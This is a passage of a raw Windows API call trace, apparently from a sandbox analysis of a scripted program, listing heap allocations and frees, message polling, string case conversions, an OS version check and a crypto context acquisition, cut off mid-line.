[0258.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.034] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0258.034] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0258.034] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.034] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0258.034] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.034] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0258.034] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.034] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0258.034] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0258.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0258.034] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0258.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.035] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0258.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0258.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.040] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0258.041] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.041] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.041] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0258.042] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0258.042] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.043] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0258.043] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.043] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0258.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0258.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.044] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.044] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0258.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0258.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0258.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.045] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0258.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0258.045] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0258.046] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0258.046] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0258.046] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0258.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, 